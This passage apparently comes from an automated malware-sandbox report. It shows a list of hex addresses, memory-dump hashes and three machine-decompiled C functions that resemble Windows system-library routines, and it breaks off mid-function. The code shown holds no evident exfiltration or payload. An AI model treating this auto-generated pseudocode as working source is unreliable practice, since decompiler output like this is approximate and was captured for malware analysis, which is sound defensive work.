                                          0x00f2dc72
                                          0x00f2dc75
                                          0x00f2dc77
                                          0x00f2dc79
                                          0x00f7b551
                                          0x00f7b551
                                          0x00000000
                                          0x00f2dc7f
                                          0x00f2dc7f
                                          0x00f2dc81
                                          0x00000000
                                          0x00f2dc83
                                          0x00f2dc86
                                          0x00f2dc88
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f2dc88
                                          0x00f2dc81
                                          0x00f2dc79
                                          0x00f2dc6c
                                          0x00f2dc55
                                          0x00f2dc47
                                          0x00f2dc43
                                          0x00000000
                                          0x00f2dc36
                                          0x00f2dc23
                                          0x00000000
                                          0x00f2dbff
                                          0x00f2dbf1
                                          0x00f2dbdf
                                          0x00f2db8f
                                          0x00f2db92
                                          0x00f2db95
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f2db95
                                          0x00f2db8d
                                          0x00f2db85
                                          0x00f2db74
                                          0x00f2dc9f
                                          0x00f2dca2
                                          0x00f2dcb0
                                          0x00f2dcb0
                                          0x00f2dad1
                                          0x00f7b4e5
                                          0x00f7b4c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f2d831
                                          0x00000000
                                          0x00f2d800
                                          0x00f7b47f
                                          0x00f7b485
                                          0x00000000
                                          0x00f7b485
                                          0x00f2d665
                                          0x00f2d652
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da086e13579e50dd5006304aa6705a7b61cb12ddfa49f76c221295480e1630e6
                                          • Instruction ID: 54f23e9b88f516ffcb0ca8f105d68e73b4d89e0d8f74cd15aabb2a6eafec3eb4
                                          • Opcode Fuzzy Hash: da086e13579e50dd5006304aa6705a7b61cb12ddfa49f76c221295480e1630e6
                                          • Instruction Fuzzy Hash: 70E1D331E00369CFDB35CF14DC84BA9B7B1BF46324F1441AAE9499B291D738AD81EB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E00F2849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                          				void* _t136;
                                          				signed int _t139;
                                          				signed int _t141;
                                          				signed int _t145;
                                          				intOrPtr _t146;
                                          				signed int _t149;
                                          				signed int _t150;
                                          				signed int _t161;
                                          				signed int _t163;
                                          				signed int _t165;
                                          				signed int _t169;
                                          				signed int _t171;
                                          				signed int _t194;
                                          				signed int _t200;
                                          				void* _t201;
                                          				signed int _t204;
                                          				signed int _t206;
                                          				signed int _t210;
                                          				signed int _t214;
                                          				signed int _t215;
                                          				signed int _t218;
                                          				void* _t221;
                                          				signed int _t224;
                                          				signed int _t226;
                                          				intOrPtr _t228;
                                          				signed int _t232;
                                          				signed int _t233;
                                          				signed int _t234;
                                          				void* _t237;
                                          				void* _t238;
                                          
                                          				_t236 = __esi;
                                          				_t235 = __edi;
                                          				_t193 = __ebx;
                                          				_push(0x70);
                                          				_push(0xfef9c0);
                                          				E00F6D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                          				if( *0x1007b04 == 0) {
                                          					L4:
                                          					goto L5;
                                          				} else {
                                          					_t136 = E00F2CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                          					_t236 = 0;
                                          					if(_t136 < 0) {
                                          						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                          					}
                                          					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                          						_t193 =  *( *[fs:0x30] + 0x18);
                                          						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                          						 *(_t237 - 0x68) = _t236;
                                          						 *(_t237 - 0x6c) = _t236;
                                          						_t235 = _t236;
                                          						 *(_t237 - 0x60) = _t236;
                                          						E00F32280( *[fs:0x30], 0x1008550);
                                          						_t139 =  *0x1007b04; // 0x1
                                          						__eflags = _t139 - 1;
                                          						if(__eflags != 0) {
                                          							_t200 = 0xc;
                                          							_t201 = _t237 - 0x40;
                                          							_t141 = E00F4F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                          							 *(_t237 - 0x44) = _t141;
                                          							__eflags = _t141;
                                          							if(_t141 < 0) {
                                          								L50:
                                          								E00F2FFB0(_t193, _t235, 0x1008550);
                                          								L5:
                                          								return E00F6D130(_t193, _t235, _t236);
                                          							}
                                          							_push(_t201);
                                          							_t221 = 0x10;
                                          							_t202 =  *(_t237 - 0x40);
                                          							_t145 = E00F11C45( *(_t237 - 0x40), _t221);
                                          							 *(_t237 - 0x44) = _t145;
                                          							__eflags = _t145;
                                          							if(_t145 < 0) {
                                          								goto L50;
                                          							}
                                          							_t146 =  *0x1007b9c; // 0x0
                                          							_t235 = L00F34620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                          							 *(_t237 - 0x60) = _t235;
                                          							__eflags = _t235;
                                          							if(_t235 == 0) {
                                          								_t149 = 0xc0000017;
                                          								 *(_t237 - 0x44) = 0xc0000017;
                                          							} else {
                                          								_t149 =  *(_t237 - 0x44);
                                          							}
                                          							__eflags = _t149;
                                          							if(__eflags >= 0) {
                                          								L8:
                                          								 *(_t237 - 0x64) = _t235;
                                          								_t150 =  *0x1007b10; // 0x0
                                          								 *(_t237 - 0x4c) = _t150;
                                          								_push(_t237 - 0x74);
                                          								_push(_t237 - 0x39);
                                          								_push(_t237 - 0x58);
                                          								_t193 = E00F4A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                          								 *(_t237 - 0x44) = _t193;
                                          								__eflags = _t193;
                                          								if(_t193 < 0) {
                                          									L30:
                                          									E00F2FFB0(_t193, _t235, 0x1008550);
                                          									__eflags = _t235 - _t237 - 0x38;
                                          									if(_t235 != _t237 - 0x38) {
                                          										_t235 =  *(_t237 - 0x48);
                                          										L00F377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                          									} else {
                                          										_t235 =  *(_t237 - 0x48);
                                          									}
                                          									__eflags =  *(_t237 - 0x6c);
                                          									if( *(_t237 - 0x6c) != 0) {
                                          										L00F377F0(_t235, _t236,  *(_t237 - 0x6c));
                                          									}
                                          									__eflags = _t193;
                                          									if(_t193 >= 0) {
                                          										goto L4;
                                          									} else {
                                          										goto L5;
                                          									}
                                          								}
                                          								_t204 =  *0x1007b04; // 0x1
                                          								 *(_t235 + 8) = _t204;
                                          								__eflags =  *((char*)(_t237 - 0x39));
                                          								if( *((char*)(_t237 - 0x39)) != 0) {
                                          									 *(_t235 + 4) = 1;
                                          									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                          									_t161 =  *0x1007b10; // 0x0
                                          									 *(_t237 - 0x4c) = _t161;
                                          								} else {
                                          									 *(_t235 + 4) = _t236;
                                          									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                          								}
                                          								 *((intOrPtr*)(_t237 - 0x54)) = E00F537C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                          								_t224 = _t236;
                                          								 *(_t237 - 0x40) = _t236;
                                          								 *(_t237 - 0x50) = _t236;
                                          								while(1) {
                                          									_t163 =  *(_t235 + 8);
                                          									__eflags = _t224 - _t163;
                                          									if(_t224 >= _t163) {
                                          										break;
                                          									}
                                          									_t228 =  *0x1007b9c; // 0x0
                                          									_t214 = L00F34620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                          									 *(_t237 - 0x78) = _t214;
                                          									__eflags = _t214;
                                          									if(_t214 == 0) {
                                          										L52:
                                          										_t193 = 0xc0000017;
                                          										L19:
                                          										 *(_t237 - 0x44) = _t193;
                                          										L20:
                                          										_t206 =  *(_t237 - 0x40);
                                          										__eflags = _t206;
                                          										if(_t206 == 0) {
                                          											L26:
                                          											__eflags = _t193;
                                          											if(_t193 < 0) {
                                          												E00F537F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                          												__eflags =  *((char*)(_t237 - 0x39));
                                          												if( *((char*)(_t237 - 0x39)) != 0) {
                                          													 *0x1007b10 =  *0x1007b10 - 8;
                                          												}
                                          											} else {
                                          												_t169 =  *(_t237 - 0x68);
                                          												__eflags = _t169;
                                          												if(_t169 != 0) {
                                          													 *0x1007b04 =  *0x1007b04 - _t169;
                                          												}
                                          											}
                                          											__eflags = _t193;
                                          											if(_t193 >= 0) {
                                          												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                          											}
                                          											goto L30;
                                          										}
                                          										_t226 = _t206 * 0xc;
                                          										__eflags = _t226;
                                          										_t194 =  *(_t237 - 0x48);
                                          										do {
                                          											 *(_t237 - 0x40) = _t206 - 1;
                                          											_t226 = _t226 - 0xc;
                                          											 *(_t237 - 0x4c) = _t226;
                                          											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                          											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                          												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                          												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                          													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                          													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                          													__eflags =  *((char*)(_t237 - 0x39));
                                          													if( *((char*)(_t237 - 0x39)) == 0) {
                                          														_t171 = _t210;
                                          													} else {
                                          														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                          														L00F377F0(_t194, _t236, _t210 - 8);
                                          														_t171 =  *(_t237 - 0x50);
                                          													}
                                          													L48:
                                          													L00F377F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                          													L46:
                                          													_t206 =  *(_t237 - 0x40);
                                          													_t226 =  *(_t237 - 0x4c);
                                          													goto L24;
                                          												}
                                          												 *0x1007b08 =  *0x1007b08 + 1;
                                          												goto L24;
                                          											}
                                          											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                          											__eflags = _t171;
                                          											if(_t171 != 0) {
                                          												__eflags =  *((char*)(_t237 - 0x39));
                                          												if( *((char*)(_t237 - 0x39)) == 0) {
                                          													goto L48;
                                          												}
                                          												E00F557C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                          												goto L46;
                                          											}
                                          											L24:
                                          											__eflags = _t206;
                                          										} while (_t206 != 0);
                                          										_t193 =  *(_t237 - 0x44);
                                          										goto L26;
                                          									}
                                          									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                          									 *(_t237 - 0x7c) = _t232;
                                          									 *(_t232 - 4) = _t214;
                                          									 *(_t237 - 4) = _t236;
                                          									E00F5F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                          									_t238 = _t238 + 0xc;
                                          									 *(_t237 - 4) = 0xfffffffe;
                                          									_t215 =  *(_t237 - 0x48);
                                          									__eflags = _t193;
                                          									if(_t193 < 0) {
                                          										L00F377F0(_t215, _t236,  *(_t237 - 0x78));
                                          										goto L20;
                                          									}
                                          									__eflags =  *((char*)(_t237 - 0x39));
                                          									if( *((char*)(_t237 - 0x39)) != 0) {
                                          										_t233 = E00F4A44B( *(_t237 - 0x4c));
                                          										 *(_t237 - 0x50) = _t233;
                                          										__eflags = _t233;
                                          										if(_t233 == 0) {
                                          											L00F377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                          											goto L52;
                                          										}
                                          										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                          										L17:
                                          										_t234 =  *(_t237 - 0x40);
                                          										_t218 = _t234 * 0xc;
                                          										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                          										 *(_t218 + _t235 + 0x10) = _t236;
                                          										_t224 = _t234 + 1;
                                          										 *(_t237 - 0x40) = _t224;
                                          										 *(_t237 - 0x50) = _t224;
                                          										_t193 =  *(_t237 - 0x44);
                                          										continue;
                                          									}
                                          									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                          									goto L17;
                                          								}
                                          								 *_t235 = _t236;
                                          								_t165 = 0x10 + _t163 * 0xc;
                                          								__eflags = _t165;
                                          								_push(_t165);
                                          								_push(_t235);
                                          								_push(0x23);
                                          								_push(0xffffffff);
                                          								_t193 = E00F596C0();
                                          								goto L19;
                                          							} else {
                                          								goto L50;
                                          							}
                                          						}
                                          						_t235 = _t237 - 0x38;
                                          						 *(_t237 - 0x60) = _t235;
                                          						goto L8;
                                          					}
                                          					goto L4;
                                          				}
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11fb804ccd25e2024f5acc175202784e1a19f9504bc9ffd1742023cd9d8caa4a
                                          • Instruction ID: 632de059874185b27341087e7249e558dea8cc3e2fa582687d5ff88b9caa8dc1
                                          • Opcode Fuzzy Hash: 11fb804ccd25e2024f5acc175202784e1a19f9504bc9ffd1742023cd9d8caa4a
                                          • Instruction Fuzzy Hash: 5EB1BF70E05219DFDB24DFD8D880AADBBB5FF48310F20812AE505AB345DB74AD46EB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E00F4513A(intOrPtr __ecx, void* __edx) {
                                          				signed int _v8;
                                          				signed char _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				char _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				char _v63;
                                          				char _v64;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed char* _v92;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				char _v105;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t157;
                                          				signed int _t159;
                                          				signed int _t160;
                                          				unsigned int* _t161;
                                          				intOrPtr _t165;
                                          				signed int _t172;
                                          				signed char* _t181;
                                          				intOrPtr _t189;
                                          				intOrPtr* _t200;
                                          				signed int _t202;
                                          				signed int _t203;
                                          				char _t204;
                                          				signed int _t207;
                                          				signed int _t208;
                                          				void* _t209;
                                          				intOrPtr _t210;
                                          				signed int _t212;
                                          				signed int _t214;
                                          				signed int _t221;
                                          				signed int _t222;
                                          				signed int _t226;
                                          				intOrPtr* _t232;
                                          				signed int _t233;
                                          				signed int _t234;
                                          				intOrPtr _t237;
                                          				intOrPtr _t238;
                                          				intOrPtr _t240;
                                          				void* _t245;
                                          				signed int _t246;
                                          				signed int _t247;
                                          				void* _t248;
                                          				void* _t251;
                                          				void* _t252;
                                          				signed int _t253;
                                          				signed int _t255;
                                          				signed int _t256;
                                          
                                          				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                          				_v8 =  *0x100d360 ^ _t255;
                                          				_v32 = _v32 & 0x00000000;
                                          				_t251 = __edx;
                                          				_t237 = __ecx;
                                          				_t212 = 6;
                                          				_t245 =  &_v84;
                                          				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                          				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                          				_v48 = __ecx;
                                          				_v36 = _t207;
                                          				_t157 = memset(_t245, 0, _t212 << 2);
                                          				_t256 = _t255 + 0xc;
                                          				_t246 = _t245 + _t212;
                                          				if(_t207 == 2) {
                                          					_t247 =  *(_t237 + 0x60);
                                          					_t208 =  *(_t237 + 0x64);
                                          					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                          					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                          					_v104 = _t159;
                                          					_v76 = _t159;
                                          					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                          					_v100 = _t160;
                                          					_v72 = _t160;
                                          					L19:
                                          					_v80 = _t208;
                                          					_v84 = _t247;
                                          					L8:
                                          					_t214 = 0;
                                          					if( *(_t237 + 0x74) > 0) {
                                          						_t82 = _t237 + 0x84; // 0x124
                                          						_t161 = _t82;
                                          						_v92 = _t161;
                                          						while( *_t161 >> 0x1f != 0) {
                                          							_t200 = _v92;
                                          							if( *_t200 == 0x80000000) {
                                          								break;
                                          							}
                                          							_t214 = _t214 + 1;
                                          							_t161 = _t200 + 0x10;
                                          							_v92 = _t161;
                                          							if(_t214 <  *(_t237 + 0x74)) {
                                          								continue;
                                          							}
                                          							goto L9;
                                          						}
                                          						_v88 = _t214 << 4;
                                          						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                          						_t165 = 0;
                                          						asm("adc eax, [ecx+edx+0x7c]");
                                          						_v24 = _t165;
                                          						_v28 = _v40;
                                          						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                          						_t221 = _v40;
                                          						_v16 =  *_v92;
                                          						_v32 =  &_v28;
                                          						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                          							goto L9;
                                          						}
                                          						_t240 = _v48;
                                          						if( *_v92 != 0x80000000) {
                                          							goto L9;
                                          						}
                                          						 *((intOrPtr*)(_t221 + 8)) = 0;
                                          						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                          						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                          						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                          						_t226 = 0;
                                          						_t181 = _t251 + 0x66;
                                          						_v88 = 0;
                                          						_v92 = _t181;
                                          						do {
                                          							if( *((char*)(_t181 - 2)) == 0) {
                                          								goto L31;
                                          							}
                                          							_t226 = _v88;
                                          							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                          								_t181 = E00F5D0F0(1, _t226 + 0x20, 0);
                                          								_t226 = _v40;
                                          								 *(_t226 + 8) = _t181;
                                          								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                          								L34:
                                          								if(_v44 == 0) {
                                          									goto L9;
                                          								}
                                          								_t210 = _v44;
                                          								_t127 = _t210 + 0x1c; // 0x1c
                                          								_t249 = _t127;
                                          								E00F32280(_t181, _t127);
                                          								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                          								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                          								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                          									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                          								}
                                          								_t189 = L00F34620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                          								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                          								if(_t189 != 0) {
                                          									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                          									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                          									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                          									 *_t232 = _t232 + 0x10;
                                          									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                          									E00F5F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                          									_t256 = _t256 + 0xc;
                                          								}
                                          								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                          								E00F2FFB0(_t210, _t249, _t249);
                                          								_t222 = _v76;
                                          								_t172 = _v80;
                                          								_t208 = _v84;
                                          								_t247 = _v88;
                                          								L10:
                                          								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                          								_v44 = _t238;
                                          								if(_t238 != 0) {
                                          									 *0x100b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                          									_v44();
                                          								}
                                          								_pop(_t248);
                                          								_pop(_t252);
                                          								_pop(_t209);
                                          								return E00F5B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                          							}
                                          							_t181 = _v92;
                                          							L31:
                                          							_t226 = _t226 + 1;
                                          							_t181 =  &(_t181[0x18]);
                                          							_v88 = _t226;
                                          							_v92 = _t181;
                                          						} while (_t226 < 4);
                                          						goto L34;
                                          					}
                                          					L9:
                                          					_t172 = _v104;
                                          					_t222 = _v100;
                                          					goto L10;
                                          				}
                                          				_t247 = _t246 | 0xffffffff;
                                          				_t208 = _t247;
                                          				_v84 = _t247;
                                          				_v80 = _t208;
                                          				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                          					_t233 = _v72;
                                          					_v105 = _v64;
                                          					_t202 = _v76;
                                          				} else {
                                          					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                          					_v105 = 1;
                                          					if(_v63 <= _t204) {
                                          						_v63 = _t204;
                                          					}
                                          					_t202 = _v76 |  *(_t251 + 0x40);
                                          					_t233 = _v72 |  *(_t251 + 0x44);
                                          					_t247 =  *(_t251 + 0x38);
                                          					_t208 =  *(_t251 + 0x3c);
                                          					_v76 = _t202;
                                          					_v72 = _t233;
                                          					_v84 = _t247;
                                          					_v80 = _t208;
                                          				}
                                          				_v104 = _t202;
                                          				_v100 = _t233;
                                          				if( *((char*)(_t251 + 0xc4)) != 0) {
                                          					_t237 = _v48;
                                          					_v105 = 1;
                                          					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                          						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                          						_t237 = _v48;
                                          					}
                                          					_t203 = _t202 |  *(_t251 + 0xb8);
                                          					_t234 = _t233 |  *(_t251 + 0xbc);
                                          					_t247 = _t247 &  *(_t251 + 0xb0);
                                          					_t208 = _t208 &  *(_t251 + 0xb4);
                                          					_v104 = _t203;
                                          					_v76 = _t203;
                                          					_v100 = _t234;
                                          					_v72 = _t234;
                                          					_v84 = _t247;
                                          					_v80 = _t208;
                                          				}
                                          				if(_v105 == 0) {
                                          					_v36 = _v36 & 0x00000000;
                                          					_t208 = 0;
                                          					_t247 = 0;
                                          					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                          					goto L19;
                                          				} else {
                                          					_v36 = 1;
                                          					goto L8;
                                          				}
                                          			}
































































                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E00F1C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                          				signed int _v8;
                                          				char _v1036;
                                          				signed int _v1040;
                                          				char _v1048;
                                          				signed int _v1052;
                                          				signed char _v1056;
                                          				void* _v1058;
                                          				char _v1060;
                                          				signed int _v1064;
                                          				void* _v1068;
                                          				intOrPtr _v1072;
                                          				void* _v1084;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t70;
                                          				intOrPtr _t72;
                                          				signed int _t74;
                                          				intOrPtr _t77;
                                          				signed int _t78;
                                          				signed int _t81;
                                          				void* _t101;
                                          				signed int _t102;
                                          				signed int _t107;
                                          				signed int _t109;
                                          				signed int _t110;
                                          				signed char _t111;
                                          				signed int _t112;
                                          				signed int _t113;
                                          				signed int _t114;
                                          				intOrPtr _t116;
                                          				void* _t117;
                                          				char _t118;
                                          				void* _t120;
                                          				char _t121;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				signed int _t125;
                                          
                                          				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                          				_v8 =  *0x100d360 ^ _t125;
                                          				_t116 = _a4;
                                          				_v1056 = _a16;
                                          				_v1040 = _a24;
                                          				if(E00F26D30( &_v1048, _a8) < 0) {
                                          					L4:
                                          					_pop(_t117);
                                          					_pop(_t120);
                                          					_pop(_t101);
                                          					return E00F5B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                          				}
                                          				_t70 = _a20;
                                          				if(_t70 >= 0x3f4) {
                                          					_t121 = _t70 + 0xc;
                                          					L19:
                                          					_t107 =  *( *[fs:0x30] + 0x18);
                                          					__eflags = _t107;
                                          					if(_t107 == 0) {
                                          						L60:
                                          						_t68 = 0xc0000017;
                                          						goto L4;
                                          					}
                                          					_t72 =  *0x1007b9c; // 0x0
                                          					_t74 = L00F34620(_t107, _t107, _t72 + 0x180000, _t121);
                                          					_v1064 = _t74;
                                          					__eflags = _t74;
                                          					if(_t74 == 0) {
                                          						goto L60;
                                          					}
                                          					_t102 = _t74;
                                          					_push( &_v1060);
                                          					_push(_t121);
                                          					_push(_t74);
                                          					_push(2);
                                          					_push( &_v1048);
                                          					_push(_t116);
                                          					_t122 = E00F59650();
                                          					__eflags = _t122;
                                          					if(_t122 >= 0) {
                                          						L7:
                                          						_t114 = _a12;
                                          						__eflags = _t114;
                                          						if(_t114 != 0) {
                                          							_t77 = _a20;
                                          							L26:
                                          							_t109 =  *(_t102 + 4);
                                          							__eflags = _t109 - 3;
                                          							if(_t109 == 3) {
                                          								L55:
                                          								__eflags = _t114 - _t109;
                                          								if(_t114 != _t109) {
                                          									L59:
                                          									_t122 = 0xc0000024;
                                          									L15:
                                          									_t78 = _v1052;
                                          									__eflags = _t78;
                                          									if(_t78 != 0) {
                                          										L00F377F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                          									}
                                          									_t68 = _t122;
                                          									goto L4;
                                          								}
                                          								_t110 = _v1056;
                                          								_t118 =  *((intOrPtr*)(_t102 + 8));
                                          								_v1060 = _t118;
                                          								__eflags = _t110;
                                          								if(_t110 == 0) {
                                          									L10:
                                          									_t122 = 0x80000005;
                                          									L11:
                                          									_t81 = _v1040;
                                          									__eflags = _t81;
                                          									if(_t81 == 0) {
                                          										goto L15;
                                          									}
                                          									__eflags = _t122;
                                          									if(_t122 >= 0) {
                                          										L14:
                                          										 *_t81 = _t118;
                                          										goto L15;
                                          									}
                                          									__eflags = _t122 - 0x80000005;
                                          									if(_t122 != 0x80000005) {
                                          										goto L15;
                                          									}
                                          									goto L14;
                                          								}
                                          								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                          								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                          									goto L10;
                                          								}
                                          								_push( *((intOrPtr*)(_t102 + 8)));
                                          								_t59 = _t102 + 0xc; // 0xc
                                          								_push(_t110);
                                          								L54:
                                          								E00F5F3E0();
                                          								_t125 = _t125 + 0xc;
                                          								goto L11;
                                          							}
                                          							__eflags = _t109 - 7;
                                          							if(_t109 == 7) {
                                          								goto L55;
                                          							}
                                          							_t118 = 4;
                                          							__eflags = _t109 - _t118;
                                          							if(_t109 != _t118) {
                                          								__eflags = _t109 - 0xb;
                                          								if(_t109 != 0xb) {
                                          									__eflags = _t109 - 1;
                                          									if(_t109 == 1) {
                                          										__eflags = _t114 - _t118;
                                          										if(_t114 != _t118) {
                                          											_t118 =  *((intOrPtr*)(_t102 + 8));
                                          											_v1060 = _t118;
                                          											__eflags = _t118 - _t77;
                                          											if(_t118 > _t77) {
                                          												goto L10;
                                          											}
                                          											_push(_t118);
                                          											_t56 = _t102 + 0xc; // 0xc
                                          											_push(_v1056);
                                          											goto L54;
                                          										}
                                          										__eflags = _t77 - _t118;
                                          										if(_t77 != _t118) {
                                          											L34:
                                          											_t122 = 0xc0000004;
                                          											goto L15;
                                          										}
                                          										_t111 = _v1056;
                                          										__eflags = _t111 & 0x00000003;
                                          										if((_t111 & 0x00000003) == 0) {
                                          											_v1060 = _t118;
                                          											__eflags = _t111;
                                          											if(__eflags == 0) {
                                          												goto L10;
                                          											}
                                          											_t42 = _t102 + 0xc; // 0xc
                                          											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                          											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                          											_push(_t111);
                                          											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                          											_push(0);
                                          											_push( &_v1048);
                                          											_t122 = E00F513C0(_t102, _t118, _t122, __eflags);
                                          											L44:
                                          											_t118 = _v1072;
                                          											goto L11;
                                          										}
                                          										_t122 = 0x80000002;
                                          										goto L15;
                                          									}
                                          									_t122 = 0xc0000024;
                                          									goto L44;
                                          								}
                                          								__eflags = _t114 - _t109;
                                          								if(_t114 != _t109) {
                                          									goto L59;
                                          								}
                                          								_t118 = 8;
                                          								__eflags = _t77 - _t118;
                                          								if(_t77 != _t118) {
                                          									goto L34;
                                          								}
                                          								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                          								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                          									goto L34;
                                          								}
                                          								_t112 = _v1056;
                                          								_v1060 = _t118;
                                          								__eflags = _t112;
                                          								if(_t112 == 0) {
                                          									goto L10;
                                          								}
                                          								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                          								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                          								goto L11;
                                          							}
                                          							__eflags = _t114 - _t118;
                                          							if(_t114 != _t118) {
                                          								goto L59;
                                          							}
                                          							__eflags = _t77 - _t118;
                                          							if(_t77 != _t118) {
                                          								goto L34;
                                          							}
                                          							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                          							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                          								goto L34;
                                          							}
                                          							_t113 = _v1056;
